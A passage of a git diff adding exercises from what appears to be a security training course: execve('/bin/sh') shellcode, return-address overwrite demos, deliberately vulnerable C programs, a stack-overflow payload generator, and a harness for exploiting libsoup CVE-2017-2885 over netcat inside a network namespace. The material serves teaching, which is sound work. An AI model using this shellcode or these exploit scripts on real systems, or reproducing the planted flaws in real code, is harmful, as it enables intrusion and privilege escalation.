+/* + * This program sets up an execve() system call to run /bin/sh with empty + * environment and no extra parameters. This is done using inline assembly and + * the x86_64 syscall instruction. + */ + +/* + * This program modifies the .text segment (i.e. the code modifies itself) + * which is not allowed by default. + * + * This happens only for demonstration purposes to test the assembler code so + * bypassing this restriction is not really relevant for the security exploit + * in practice. + * + * To get this code to work for testing we can modify the page protection + * during runtime with mprotect() or link with writable text segments. + * + * The ld option -N recently started producing a linker error with + * __ehdr_start being undefined. It seems to have to do with the GOT/PLT + * table being generated and requiring dynamic linking. Therefore we use the + * mprotect approach now. + */ +#define USE_MPROTECT + +#ifdef USE_MPROTECT + +# include +# include + +static void make_test_writable(void *mainptr) { + // mark main() code writable during runtime, an alternative to linking + // with -Wl-N and statically + intptr_t addr = (intptr_t)mainptr; + // round down to the page size boundary + addr = addr & (~(intptr_t)(4096-1)); + // allow all operations on the code + mprotect((void*)addr, 4096, PROT_READ | PROT_WRITE | PROT_EXEC); +} + +#endif // USE_MPROTECT + +int main() { +#ifdef USE_MPROTECT + make_test_writable(&main); +#endif + + /* + * the execve(2) system call takes the following parameters: + * + * rax: the system call number 0x3b + * rdi: a pointer to the string representing the path to the + * program to execute + * rsi: a pointer to the argument list (char **) terminated with a + * NULL pointer + * rdx: a pointer to the environment list (char **) terminated with a + * NULL pointer + */ + + __asm__( + // jump to the call instruction, which will get the stack + // address to use for our exec() parameter addressing. + // + // the offset to jump to needs to be calculated manually by + // adding the length of the assembler instructions or by + // disassembling the code. The length of each assembler + // instruction is annotated in the comment lines following the + // statements. + "jmp . + 0x33\n" // 2 bytes + // retrieve the return address that the call instruction put + // on the stack into %rbx + "popq %rbx\n" // 1 byte + // write the address of the /bin/sh string just after the + // string data to serve as argv[] list to execve() + "movq %rbx,0x8(%rbx)\n" // 4 bytes + // make sure the /bin/sh string is null terminated (could have + // been skipped in case of strcpy() based overflow or other \0 + // based string copy functions) + "movb $0x0,0x7(%rbx)\n" // 4 bytes + // provide a null pointer terminator for the argv[] and envp[] + // list to execve() + "movq $0x0,0x10(%rbx)\n" // 8 bytes + // setup the execve() parameters + // + // system call number + "movq $0x3b,%rax\n" // 7 bytes + // the address of the /bin/sh string, the program to execute + "movq %rbx,%rdi\n" // 3 bytes + // the address of the address of the /bin/sh string and a + // following NULL terminator to serve as a parameter list + "leaq 0x8(%rbx),%rsi\n" // 4 bytes + // address of the terminating NULL pointer for the environment + // list (the program will start with an empty environment) + "leaq 0x10(%rbx),%rdx\n" // 4 bytes + // execute the system call + "syscall\n" // 2 bytes + // fallback code if execve() should fail: exit with 0 + // thus we keep a low profile, user/administrator might wonder + // why the program exited but there will be no visible crash + // if something went wrong. + "movq $0x1, %rax\n" // 7 bytes + // put constant zero in rbx, without actually using a zero + // constant + "xorq %rbx, %rbx\n" // 3 bytes + "int $0x80\n" // 2 bytes + // jump back to the 'popq' instruction, this will put the + // return address, the address of the next instruction (i.e. + // the address to the exec string parameter!) onto the stack + "call . - 0x31\n" // 5 bytes + ".string \"/bin/sh\"\n" // 8 bytes + ); +} + diff --git a/examples/exec_snippet/exec_bin.c b/examples/exec_snippet/exec_bin.c new file mode 100644 index 0000000..720de9e --- /dev/null +++ b/examples/exec_snippet/exec_bin.c @@ -0,0 +1,62 @@ +#include + +/* + * Matthias Gerstner + * SUSE Linux GmbH + * matthias.gerstner@suse.com + */ + +/* + * This function finds the location of the return address (i.e. void**) on the + * stack. `start` needs to be the a 8-byte aligned start address on the stack + * to start with and `cur_ret` needs to be the current return address. + * + * There is no really realiable way to get this address otherwise, since + * there's usually no need to achieve this programmatically. + */ +void** get_return_address_ptr(void **start, void *cur_ret) { + int i; + + // We need to reach the return address, it is found some locations + // after the location of the local stack parameter. this logic will + // fail if `start` is not on a 8-byte boundary. For safety reasons + // don't continue until we reach the end of the stack but just look + // into the first few qwords until we give up. + for (i = 0; i < 32; i++) { + start++; + + if (*start == cur_ret) + return start; + } + + return NULL; +} + +void main() { + // This builtin gcc function allows to retrieve the current return address value + void *ret = __builtin_return_address(0); + void **retp = get_return_address_ptr(&ret, ret); + + /* + * this is binary x86_64 code extracted from the exec_asm.c binary that + * performs an exec system call for /bin/sh and then, should the exec() fail + * for some reason, calls exit(0); + */ + const char execve_code[] = { + 0xeb, 0x31, 0x5b, 0x48, 0x89, 0x5b, 0x08, 0xc6, 0x43, 0x07, 0x00, 0x48, + 0xc7, 0x43, 0x10, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x3b, 0x00, + 0x00, 0x00, 0x48, 0x89, 0xdf, 0x48, 0x8d, 0x73, 0x08, 0x48, 0x8d, 0x53, + 0x10, 0x0f, 0x05, 0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00, 0x48, 0x31, + 0xdb, 0xcd, 0x80, 0xe8, 0xca, 0xff, 0xff, 0xff, 0x2f, 0x62, 0x69, 0x6e, + 0x2f, 0x73, 0x68 + }; + + if (!retp) { + fprintf(stderr, "Failed to determine return address location!\n"); + return; + } + + // overwrite the return address to be our injected binary code + (*retp) = (void*)execve_code; +} + diff --git a/examples/exit_snippet/.gitignore b/examples/exit_snippet/.gitignore new file mode 100644 index 0000000..e69de29 diff --git a/examples/exit_snippet/Makefile b/examples/exit_snippet/Makefile new file mode 100644 index 0000000..02f4269 --- /dev/null +++ b/examples/exit_snippet/Makefile @@ -0,0 +1,15 @@ +BINS=exit_asm exit_bin +all: $(BINS) + +exit_asm: exit_asm.c + gcc -g $< -o $@ + +exit_bin: exit_bin.c + @which execstack >/dev/null 2>&1 || ( echo "you need to install 'execstack'" && exit 1 ) + gcc -g $< -o $@ + # this is necessary to avoid a SEGFAULT because of writing to the text + # segment + execstack -s $@ || rm $@ + +clean: + rm -f *.o $(BINS) diff --git a/examples/exit_snippet/README.md b/examples/exit_snippet/README.md new file mode 100644 index 0000000..aed7262 --- /dev/null +++ b/examples/exit_snippet/README.md @@ -0,0 +1,48 @@ +Dissecting the exit() System Call +================================= + +The program `exit_asm.c` contains inline assembler instructions for setting up +a call to `exit(2)`. This time I've used i686 style system call instructions +for seeing how that works, too. Later we'll use the x86\_64 `syscall` variant. + +Can you extract the binary machine code that makes up the exit system call? +There's a hint how to do it in the source code comments. + +The program `exit_bin.c` uses the extracted binary machine code in a buffer +and demonstrates how we can (purposely) exchange the return address with the +address of the buffer so we'll execute the exit system call upon return, +instead of actually returning from `main()`. + +This way we can test self-contained machine code, whether it works as +expected. We will use these machine code snippets for creating exploit +payloads later on. + +Note: You need to install the `execstack` package for successfully building +these example programs. + +Exercises +========= + +- Compile and run `exit_asm` and observe its exit code to see the system call + is working as expected. +- Disassemble its main function to see the actual assembler code embedded into + it. +- Extract the binary machine code representing the system call setup and save + it in a file. Compare the extracted data with the `exit_code[]` data found + in `exit_bin.c`. +- Compile and run `exit_bin` and observe its exit code to verify our injected + machine code is actually executed. You can also use `stepi` in `gdb` to see + the machine instructions being executed. + +Tips and Tricks +=============== + +- You can understand the binary machine code better when you look up the + machine code manual. For example [1] for AMD64. The "opcode" is the first + byte of an instruction that determines the type of instruction and what kind + of data will follow it. `0xB8` is the opcode for the MOV instruction with + the source operand being an immediate and the target operand being a + register. You will find it in the binary machine code for the exit system + call we use here. + +[1]: http://ref.x86asm.net/coder64.html diff --git a/examples/exit_snippet/exit_asm.c b/examples/exit_snippet/exit_asm.c new file mode 100644 index 0000000..add8804 --- /dev/null +++ b/examples/exit_snippet/exit_asm.c @@ -0,0 +1,36 @@ +/* + * Matthias Gerstner + * SUSE Linux GmbH + * matthias.gerstner@suse.com + * + * This program exits with an exit code of 5 by issuing the exit() system call + * via inline assembly. + * + * You can extract the assembly code via gdb like this: + * + * ``` + * # inspect assembler code locations and select the desired range + * (gdb) disas main + * [...] + * # write binary data starting from main+X till location main+Y into out.bin, + * # where X and Y are the offsets of the code you would like to extract + * (gdb) dump memory out.bin main+X main+Y + * ``` + * + * the resulting file can be formatted using 'xxd -i' to obtain a suitable C + * string literal for further usage. + */ + +int main() { + // For completeness this exit system call approach uses the 32-bit + // i686 calling convention for Linux. + // This only works for register values <= 32 bit, higher bits will be + // zeroed out. this approach will also be slower than the amd64 + // syscall instruction (when running on x86_64 hardware, of course). + __asm__( + "movl $0x1, %eax\n" + "movl $0x5, %ebx\n" + "int $0x80" + ); +} + diff --git a/examples/exit_snippet/exit_bin.c b/examples/exit_snippet/exit_bin.c new file mode 100644 index 0000000..e30296a --- /dev/null +++ b/examples/exit_snippet/exit_bin.c @@ -0,0 +1,59 @@ +#include + +/* + * Matthias Gerstner + * SUSE Linux GmbH + * matthias.gerstner@suse.com + */ + +/* + * This function finds the location of the return address (i.e. void**) on the + * stack. `start` needs to be the a 8-byte aligned start address on the stack + * to start with and `cur_ret` needs to be the current return address. + * + * There is no really realiable way to get this address otherwise, since + * there's usually no need to achieve this programmatically. + */ +void** get_return_address_ptr(void **start, void *cur_ret) { + int i; + + // We need to reach the return address, it is found some locations + // after the location of the local stack parameter. this logic will + // fail if `start` is not on a 8-byte boundary. For safety reasons + // don't continue until we reach the end of the stack but just look + // into the first few qwords until we give up. + for (i = 0; i < 32; i++) { + start++; + + if (*start == cur_ret) + return start; + } + + return NULL; +} + +void main() { + // This builtin gcc function allows to retrieve the current return address value + void *ret = __builtin_return_address(0); + void **retp = get_return_address_ptr(&ret, ret); + + /* + * This is binary machine code extracted from the binary for exit_asm.c that + * performs an exit system call with status code 5 + */ + const char exit_code[] = { + 0xb8, 0x01, 0x00, 0x00, 0x00, 0xbb, 0x05, 0x00, 0x00, 0x00, 0xcd, 0x80 + }; + + if (!retp) { + fprintf(stderr, "Failed to determine return address location!\n"); + return; + } + + // Overwrite the return address to point to our injected binary code + (*retp) = (void*)exit_code; + + // Upon returning, the machine code to call exit(5) should be executed + // instead of the regular return. This can be verified by inspecting + // the program's return code which should be 5 instead of 0. +} diff --git a/examples/gdb_intro/.gitignore b/examples/gdb_intro/.gitignore new file mode 100644 index 0000000..711e458 --- /dev/null +++ b/examples/gdb_intro/.gitignore @@ -0,0 +1,2 @@ +gdbtest +*.o diff --git a/examples/gdb_intro/Makefile b/examples/gdb_intro/Makefile new file mode 100644 index 0000000..f0be5e0 --- /dev/null +++ b/examples/gdb_intro/Makefile @@ -0,0 +1,13 @@ +MAIN = gdbtest +SOURCES = $(wildcard *.c) +OBJECTS = $(SOURCES:.c=.o) +CFLAGS ?= -g + +$(MAIN): $(OBJECTS) + gcc $(CFLAGS) $(OBJECTS) -o $(MAIN) + +%.o: %.c + gcc $(CFLAGS) -c -Wall -Werror $< -o $@ + +clean: + rm -f $(MAIN) $(OBJECTS) diff --git a/examples/gdb_intro/README.md b/examples/gdb_intro/README.md new file mode 100644 index 0000000..0366f04 --- /dev/null +++ b/examples/gdb_intro/README.md @@ -0,0 +1,108 @@ +Example Program for Testing `gdb` Invocation and First Simple `gdb` Steps +========================================================================= + +Prerequisites +------------- + +### Installing `debuginfo` Packages + +You will need to install debugging symbols for the `glibc`. It may be +necessary to enable `Debug` and `Sources` repositories in zypper before this +works. See `zypper lr -d`. When the repositories are available the required +packages can be installed as *root* (or via `sudo`) like this: + + root# zypper in glibc-debuginfo + +### Using `debuginfod` Instead + +Alternatively, if on openSUSE Tumbleweed, you can use the `debuginfod` feature +which will allow you to transparently download debug symbols for system +packages. In this case you should make the use of this feature permanent by +adding + + set debuginfod enabled on + +to your ~/.config/gdb/gdbinit, which might first need to be created. + +Compile and Run the Program +--------------------------- + +A gdbtest program exists in this directory that can be built using `make`. +Look at the C program, understand what it does and observe its behaviour. + + $ make + $ ./gdbtest + [...] + $ ./gdbtest 5 + [...] + +Custom CFLAGS can be passed to the `make` program via the `CFLAGS` environment +variable. By default the `-g` switch is passed to `gcc` to generate debug +symbols. You can clear the CFLAGS by running `make` like this: + + $ make clean; CFLAGS= make + [...] + +This will generate a binary without debugging information. You can observe the +different behaviour of `gdb` with the two versions. + +Invoke the Program in `gdb` +--------------------------- + +There are various possiblities to do this: + +1. Simply point `gdb` to the program: `gdb ./gdbtest`. +2. Pass parameters directly on the command line: `gdb --args ./gdbtest somepar`. +3. Attach to a running program: `gdb -p `. + +In all cases you will enter the `gdb` shell shown by the prompt `(gdb)`. The +`gdb` shell accepts a lot of different commands. We will learn some of the +basic ones during this training. + +By typing `start` the program will start but stop right away in the `main()` +function. If all went well then you should be able to see the first source +line in the `main()` function and be able to inspect the running program. + +Experimenting with `gdb` +------------------------ + +You can find more information on basic commands in the slides following this +example. Experiment with them to get a feeling for how `gdb` works. + +Running a System Program in `gdb` +--------------------------------- + +Let's try to debug the `ls` program. + +When using debuginfo package then we first we need to find out which package +it is belonging to: + + $ rpm -qf /usr/bin/ls + coreutils-8.31-2.1.x86_64 + +Then install the according `debuginfo` and `debugsource` package. + + root# zypper in coreutils-debuginfo coreutils-debugsource + +Look at the contents of these packages to better understand their structure: + + $ rpm -ql coreutils-debuginfo + [...] + $ rpm -ql coreutils-debugsource + +After doing this you should be able to successfully debug the `ls` command. +For example: + + $ gdb --args /usr/bin/ls /tmp + (gdb) start + [...] + +--- +**NOTE:** + +`gdb` might still complain about some missing debuginfo packages of +third-party libraries that `ls` uses. This normally still allows you to debug +the main program, although you won't be able to step into functions that +belong to these third-party libraries. + +--- diff --git a/examples/gdb_intro/gdbtest.c b/examples/gdb_intro/gdbtest.c new file mode 100644 index 0000000..3bd407f --- /dev/null +++ b/examples/gdb_intro/gdbtest.c @@ -0,0 +1,32 @@ +#include +#include + +/* + * Matthias Gerstner + * SUSE Linux GmbH + * matthias.gerstner@suse.com + */ + +void handle_parameter(const char *param) { + unsigned int to_sleep = 600; + + printf("parameter: %s\n", param); + printf("sleeping for %u seconds\n", to_sleep); + + sleep(to_sleep); +} + +void usage(const char *program) { + printf("Usage: %s \n", program); +} + +int main(int argc, const char **argv) { + + if (argc == 2) { + handle_parameter(argv[1]); + return 0; + } else { + usage(argv[0]); + return 1; + } +} diff --git a/examples/lost_memset/.gitignore b/examples/lost_memset/.gitignore new file mode 100644 index 0000000..2339af4 --- /dev/null +++ b/examples/lost_memset/.gitignore @@ -0,0 +1,2 @@ +lost_memset +lost_memset.nobuiltin diff --git a/examples/lost_memset/Makefile b/examples/lost_memset/Makefile new file mode 100644 index 0000000..befad44 --- /dev/null +++ b/examples/lost_memset/Makefile @@ -0,0 +1,13 @@ +MAIN = lost_memset +FLAGS = -g -O2 + +all: $(MAIN) + +$(MAIN): lost_memset.c + gcc $(FLAGS) $< -o $@ + +$(MAIN).nobuiltin: lost_memset.c + gcc $(FLAGS) -fno-builtin-memset $< -o $@ + +clean: + rm -f $(MAIN) $(MAIN).nobuiltin diff --git a/examples/lost_memset/README.md b/examples/lost_memset/README.md new file mode 100644 index 0000000..d070b4f --- /dev/null +++ b/examples/lost_memset/README.md @@ -0,0 +1,10 @@ +Example of an Optimized out memset() Call +========================================= + +The stack based buffer `secret` in this program is supposed to be cleared via +`memset()` at the end of the program, but as you can see in the disassembly it +won't be cleared, because it is optimized out by `gcc`. + +When built as the alternative target `lost_memset.nobuiltin` then it won't be +optimized out - at least this was the case at the time of writing this, but is +not necessarily true any more. diff --git a/examples/lost_memset/lost_memset.c b/examples/lost_memset/lost_memset.c new file mode 100644 index 0000000..7f22a85 --- /dev/null +++ b/examples/lost_memset/lost_memset.c @@ -0,0 +1,40 @@ +#include +#include +#include + +/* + * Matthias Gerstner + * SUSE Linux GmbH + * matthias.gerstner@suse.com + */ + +/* + * This program shows how a call to memset() is optimized out by typical + * compilers + */ + +const size_t MAX_LEN = 128; + +int main(int argc, char **argv) { + char secret[MAX_LEN]; + + if (argc != 2) { + fprintf(stderr, "%s: \n", argv[0]); + return 1; + } + + /* + * pretend here something sensible would be done with the string + */ + + if (snprintf(secret, MAX_LEN, "%s", argv[1]) >= MAX_LEN) { + fprintf(stderr, "secret string too long, maximum length = %zd\n", MAX_LEN); + return 1; + } + + printf("Your secret string '%s' will be cleaned now\n", secret); + + memset(secret, 0, MAX_LEN); + + return 0; +} diff --git a/examples/param_injection/.gitignore b/examples/param_injection/.gitignore new file mode 100644 index 0000000..38fe1be --- /dev/null +++ b/examples/param_injection/.gitignore @@ -0,0 +1 @@ +run_safe_prog diff --git a/examples/param_injection/Makefile b/examples/param_injection/Makefile new file mode 100644 index 0000000..0cc0749 --- /dev/null +++ b/examples/param_injection/Makefile @@ -0,0 +1,15 @@ +MAIN = run_safe_prog +SOURCES = $(wildcard *.c) +OBJECTS = $(SOURCES:.c=.o) +FLAGS = -fno-omit-frame-pointer -fno-stack-protector -O0 -g -Wall -Werror + +$(MAIN): $(OBJECTS) + gcc $(FLAGS) $(OBJECTS) -o $(MAIN) + +%.o: %.c + gcc -c $(FLAGS) $< -o $@ + +clean: + rm -f $(MAIN) $(OBJECTS) + +include ../common/Makefile diff --git a/examples/param_injection/README.md b/examples/param_injection/README.md new file mode 100644 index 0000000..6fd1400 --- /dev/null +++ b/examples/param_injection/README.md @@ -0,0 +1,38 @@ +Stack Overflow Example Demonstrating Parameter Injection +======================================================== + +This program has a stack overflow vulnerability in it. Can you find it? Can +you think of a way to exploit this to your advantage? + +The accompanying python script `replace_param.py` allows to easily create an +attack payload. But you still need to pass the correct stack address to it for +the attack to work. For simplicity the program outputs the address of the +stack variable in question. + +Prerequisites +------------- + +For the exploit to work you will need to disable a protection mechanism known +as "address space randomization". Running `make shell` will open a new shell +with the necessary adjustments for the exploit to work as expected. + +Exercises +--------- + +- Look at the content of the exploit buffer generated by the python script and + understand its structure. Note: Due to x86 processors using "little-endian" + byte order, the exploit buffer will seem to have addresses in reverse, when + looking at it e.g. with `xxd`. `xxd` has options to make this easier on the + eyes: `xxd -e -g8` displays groups of 8 bytes (a single word on amd64) in + the "correct" order. +- Single step in `gdb` and watch the overflow change the stack parameters + which will cause the change in behaviour of the program. + +Notes +----- + +- Even when running in the specially prepared shell provided by the `make + shell` target, the address of the stack buffer will change slightly when run + from different contexts like from the python script `replace_param.py`. Pay + attention to the address printed out by the program to make sure you have the + right one. diff --git a/examples/param_injection/replace_param.py b/examples/param_injection/replace_param.py new file mode 100755 index 0000000..12d3b51 --- /dev/null +++ b/examples/param_injection/replace_param.py @@ -0,0 +1,103 @@ +#!/usr/bin/python3 + +# Matthias Gerstner +# SUSE Linux GmbH +# matthias.gerstner@suse.com + +import argparse +import os +import subprocess +import sys + + +def hex_int(val): + return int(val, 16) + + +parser = argparse.ArgumentParser( + description="Tries to exploit a stack overflow by replacing a stack parameter." +) + +parser.add_argument( + "-p", "--program", + help="The program to exploit. This needs to accept input on stdin that will lead to an overflow", + default="run_safe_prog" +) + +parser.add_argument( + "-n", "--param", + help="New parameter to inject", + required=True +) + +parser.add_argument( + "-a", "--address", + help="The string address to use for overflowing", + required=True, + type=hex_int, +) + +parser.add_argument( + "-c", "--count", + help="Number of times to feed to the desired parameter address to the exploitable program's stdin after the new parameter to inject", + default=8, + type=int +) + +parser.add_argument( + "-o", "--output", + help="Instead of directly running the program just output the exploit buffer content", + default=False, + action='store_true' +) + +args = parser.parse_args() + +prog = args.program + +if not os.path.isabs(prog): + prog = os.path.join(os.getcwd(), prog) + + +if not os.path.exists(prog): + print("Couldn't find program to exploit in", prog) + sys.exit(1) + +overflow_data = args.param + '\0' +padding_bytes = 8 - (len(overflow_data) % 8) +# make sure we add the string address on a pointer aligned boundary +for pb in range(padding_bytes): + overflow_data += '\0' + +overflow_data = overflow_data.encode() +addr_bin = args.address.to_bytes(8, byteorder='little', signed=False) + +# append the desired amount of string addresses, hoping we will overflow the +# "prog_to_run" pointer correctly +for count in range(args.count): + overflow_data += addr_bin + +if args.output: + + if os.isatty(sys.stdout.fileno()): + for bt in overflow_data: + print("\\x" + format(bt, '02x'), end='') + + print() + else: + os.write(sys.stdout.fileno(), overflow_data) + sys.exit(0) + +process = subprocess.Popen( + [prog], stdin=subprocess.PIPE +) + +process.stdin.write(overflow_data) + +process.stdin.close() + +res = process.wait() +if res >= 0: + print("Program exited with", res) +else: + print("Program terminated with signal", -res) diff --git a/examples/param_injection/run_safe_prog.c b/examples/param_injection/run_safe_prog.c new file mode 100644 index 0000000..e0ddd47 --- /dev/null +++ b/examples/param_injection/run_safe_prog.c @@ -0,0 +1,60 @@ +#include +#include +#include +#include + +/* + * Matthias Gerstner + * SUSE Linux GmbH + * matthias.gerstner@suse.com + * + * Example of a vulnerable program. + * + * This program attempts to start a program on your behalf, but only one of a + * defined subset that you may select by number via stdin. + * + * Imagine this would be a setuid-root program running with root privileges. + */ + +const char* const ALLOWED_PROGS[] = { + "/usr/bin/ls", + "/usr/bin/who" +}; + +const char* const default_prog = ALLOWED_PROGS[0]; + +void runprog() { + const char *prog_to_run = default_prog; + char selection[32] = {0}; + char *parsing_end = NULL; + unsigned long index = 0; + + // this is just a little help for exploiting this program + printf("[selection ptr is at %p]\n", selection); + + scanf("%s", selection); + index = strtoul(selection, &parsing_end, 10); + + if (parsing_end == selection) { + fprintf(stderr, ">>> non-numeric input, using default prog\n"); + + } else if (index < sizeof(ALLOWED_PROGS) / sizeof(char*)) { + prog_to_run = ALLOWED_PROGS[index]; + + } else { + fprintf(stderr, ">>> invalid program index, using default\n"); + } + + printf("\n============\nRunning program '%s'\n============\n", prog_to_run); + + execl(prog_to_run, prog_to_run, NULL); + + fprintf(stderr, ">>> Failed to run program!\n"); +} + +int main() { + runprog(); + + return 0; +} + diff --git a/examples/soupstrike/README.md b/examples/soupstrike/README.md new file mode 100644 index 0000000..abe2f9e --- /dev/null +++ b/examples/soupstrike/README.md @@ -0,0 +1,127 @@ +A Real Stack Overflow Vulnerability in Gnome's libsoup Library +============================================================== + +This was a vulnerability handled in [bsc#1052916][1], CVE-2017-2885. + +[1]: https://bugzilla.suse.com/show_bug.cgi?id=1052916 + +You can read the bug description for details on what went wrong here. The +buffer in question is found in _soup-body-input-stream.c_, function +`soup_body_input_stream_read_chunked()` and its name is `char metabuf[128]`. + +This overflow is fully remote exploitable, where it not for the various +protection mechanisms under the hood. + +Exercise +======== + +First try to understand the vulnerable `metabuf` construct in the code and a +bit about the involved HTTP chunked encoding. The report in the linked +bug is pretty detailed about this. + +Can you manage to exploit this issue? Try to exploit the issue using an +attacker buffer created via `gen_exploit.py`. Keep in mind the following +aspects: + +- libsoup ships an example http server called _simple-httpd_. By compiling it + we have a suitable program to test an attack against. +- The upstream repo is at https://github.com/GNOME/libsoup.git. Version tag + `2.58.1` is the most recents version that contains the vulnerability. +- To trigger the issue you can use the accompanying script `hit-the-soup.py`. + It basically creates an HTTP header that enables chunked encoding first and + the next line of text can already overflow the target buffer. +- The exploit code must not contain the sequence "\r\n", because that would + terminate the copying operation. + +The following sections explain how to correctly build and safely start the +vulnerable web server for testing exploits against it. + +Building libsoup +---------------- + +To build libsoup with disabled protection mechanisms follow these steps: + +```sh +# you may need to install these additional dependencies +$ sudo zypper in sqlite3-devel gtk-doc libxml2-devel intltool + +# clone and checkout the vulnerable libsoup codebase +$ git clone https://github.com/GNOME/libsoup.git +$ cd libsoup +$ git checkout 2.58.1 + +# create the autotools build system +$ ./autogen.sh + +# build libsoup with debugging symbols and disabled stack protector +$ CFLAGS="-g -fno-stack-protector" ./configure +$ make + +# mark the simple-httpd binary with `execstack -s` to get an executable stack. +$ execstack -s examples/.libs/simple-httpd +``` + +Exploiting the Issue +-------------------- + +Don't run the simple-httpd executable directly, because this might be using +system libraries instead of the ones we compiled locally. The wrapper script +in `examples/simple-httpd` performs the necessary setup to make sure that +the locally built and vulnerable libraries will be used. + +The following steps will run the sample web server in an isolated environment: + +```sh +# split-off a network namespace to avoid having the vulnerable daemon +# listening on a live network +$ unshare -U -n -r +# set up the loopback device in the new network namespace +$ ip addr add 127.0.0.1/8 dev lo +$ ip link set up dev lo + +# enter a shell without protection mechanisms +(netns) $ setarch `uname -m` -R /bin/bash + +# run the server on a fixed port +(netns-exploit) $ ./examples/simple-httpd -p 4711 +``` + +--- +**NOTE:** + +The network namespace used here is part of the Linux container isolation +techniques. The shell started via the `unshare` command is attached to a +split-off networking stack that has no access to the existing network devices +of the system. Only other processes that join this network namespace will be +able to communicate over the network with the simple-httpd started this way. + +--- + +In another shell we attach to the newly created network namespace and test +whether the http server works: + +```sh +# join the network namespace simple-httpd is living in now +$ nsenter -t `pidof simple-httpd` -U -n --preserve-credentials + +# the server serves files from the CWD it runs in, thus we should be able to +# fetch the NEWS file from the libsoup checkout +(netns) $ curl localhost:4711/NEWS +[...] +``` + +In this client shell we can now attempt to trigger a full exploit. The +`hit-the-soup.py` helper script is able to create a suitably prepared exploit +that we can send to the simple-httpd via netcat: + +```sh +$ ./examples/soupstrike/hit-the-soup.py /path/to/exploit.bin | nc localhost 4711 +``` + +The exploit needs to be constructed using the `gen_exploit.py` script and the +proper return address for `metabuf`. + +For running `gdb` with `simple-httpd` it is best to attach to the running +process, since we are only executing a wrapper script for `simple-httpd` which +cannot be started directly in `gdb`. Use `gdb -p $(pidof simple-httpd)` +instead. diff --git a/examples/soupstrike/gen_exploit.py b/examples/soupstrike/gen_exploit.py new file mode 120000 index 0000000..1d3e2fd --- /dev/null +++ b/examples/soupstrike/gen_exploit.py @@ -0,0 +1 @@ +../code_injection/gen_exploit.py \ No newline at end of file diff --git a/examples/soupstrike/hit-the-soup.py b/examples/soupstrike/hit-the-soup.py new file mode 100755 index 0000000..c63dca3 --- /dev/null +++ b/examples/soupstrike/hit-the-soup.py @@ -0,0 +1,30 @@ +#!/usr/bin/python3 +from __future__ import print_function + +import argparse +import os +import sys + +# Matthias Gerstner +# SUSE Linux GmbH +# matthias.gerstner@suse.com + +parser = argparse.ArgumentParser( + description="Embed a buffer overflow exploit into a HTTP chunked transfer encoding header" +) + +parser.add_argument("-e", "--exploit", type=str, + help="Path to a file containing the binary buffer overflow exploit", + required=True) + +args = parser.parse_args() + +header = "GET / HTTP/1.0\r\nTransfer-Encoding: chunked\r\n\r\n" + +exploit = open(args.exploit, 'rb').read() +size_line = exploit +stdout_fl = sys.stdout.fileno() +# print(header, size_line, sep='', end='') +os.write(stdout_fl, header.encode()) +os.write(stdout_fl, exploit) +sys.stdout.flush() diff --git a/examples/stack_overread/.gitignore b/examples/stack_overread/.gitignore new file mode 100644 index 0000000..11a0370 --- /dev/null +++ b/examples/stack_overread/.gitignore @@ -0,0 +1 @@ +dump_head diff --git a/examples/stack_overread/Makefile b/examples/stack_overread/Makefile new file mode 100644 index 0000000..321db14 --- /dev/null +++ b/examples/stack_overread/Makefile @@ -0,0 +1,13 @@ +MAIN = dump_head +SOURCES = $(wildcard *.c) +OBJECTS = $(SOURCES:.c=.o) +FLAGS = -fno-omit-frame-pointer -O0 -g -Wall + +$(MAIN): $(OBJECTS) + gcc $(FLAGS) $(OBJECTS) -o $(MAIN) + +%.o: %.c + gcc $(FLAGS) -c $< -o $@ + +clean: + rm -f $(MAIN) $(OBJECTS) diff --git a/examples/stack_overread/README.md b/examples/stack_overread/README.md new file mode 100644 index 0000000..5e1d6de --- /dev/null +++ b/examples/stack_overread/README.md @@ -0,0 +1,14 @@ +Stack Buffer Overread +===================== + +This program has a stack buffer overread problem. It is caused by missing +zero-initializion and not communicating back the number of bytes actually +read. + +Exercises +========= + +- Find the overread issue and trigger it during runtime +- What kind of information can you gain from this weakness? +- How could some of this information help an attacker when combined with other + weaknesses in a program? diff --git a/examples/stack_overread/dump_head.c b/examples/stack_overread/dump_head.c new file mode 100644 index 0000000..3f5146b --- /dev/null +++ b/examples/stack_overread/dump_head.c @@ -0,0 +1,101 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include + +/* + * Matthias Gerstner + * SUSE Linux GmbH + * matthias.gerstner@suse.com + */ + +/* + * This program outputs a hexdump of the first N bytes from a user supplied file. + */ + +#define MAX_LENGTH 4096 +#define TMP_BUF_SIZE 128 + +void readfile(int fd, char *buf, size_t bufsize) { + char tmp[TMP_BUF_SIZE]; + size_t read_so_far = 0; + ssize_t read_res = -1; + + while (read_so_far < TMP_BUF_SIZE && read_so_far < bufsize) { + read_res = read(fd, tmp + read_so_far, TMP_BUF_SIZE - read_so_far); + + if (read_res == 0) { + // EOF + break; + } else if (read_res == -1) { + fprintf(stderr, "Failed to read from file: %s\n", strerror(errno)); + return; + } + + read_so_far += read_res; + } + + memcpy(buf, tmp, bufsize); +} + +void hexdump(const char *buf, unsigned long count) { + unsigned long byte; + + for (byte = 0; byte < count; byte++) { + if ((byte % 32) == 0) { + printf("\n"); + } else if( (byte % 4) == 0) { + printf(" "); + } + + printf("%02x", (unsigned char)buf[byte]); + } + + printf("\n"); +} + +int main(const int argc, const char **argv) { + int fd = -1; + unsigned long count = 0; + char *printbuf = NULL; + const char *path = argv[1]; + char *endptr = NULL; + + if (argc != 3) { + printf("usage: %s \n\n", argv[0]); + printf("This program will read LENGTH bytes from PATH and output them to stdout as a hexadecimal dump.\n"); + return 1; + } + + count = strtoul(argv[2], &endptr, 10); + + if ((count == ULONG_MAX && errno == ERANGE) || + count > MAX_LENGTH || endptr == argv[2]) { + printf("LENGTH couldn't be parsed or is out of range.\n"); + return 1; + } + + fd = open(path, O_RDONLY | O_CLOEXEC); + + if (fd == -1) { + printf("Failed to open %s: %s\n", path, strerror(errno)); + return 1; + } + + printbuf = malloc(count); + + readfile(fd, printbuf, count); + + printf("Hexdump of %ld bytes of %s\n", count, path); + hexdump(printbuf, count); + + (void)close(fd); + free(printbuf); + + return 0; +} diff --git a/examples/uninitialized_data/.gitignore b/examples/uninitialized_data/.gitignore new file mode 100644 index 0000000..1908948 --- /dev/null +++ b/examples/uninitialized_data/.gitignore @@ -0,0 +1,3 @@ +random_svc +random_client +pseudo_random diff --git a/examples/uninitialized_data/Makefile b/examples/uninitialized_data/Makefile new file mode 100644 index 0000000..a34a845 --- /dev/null +++ 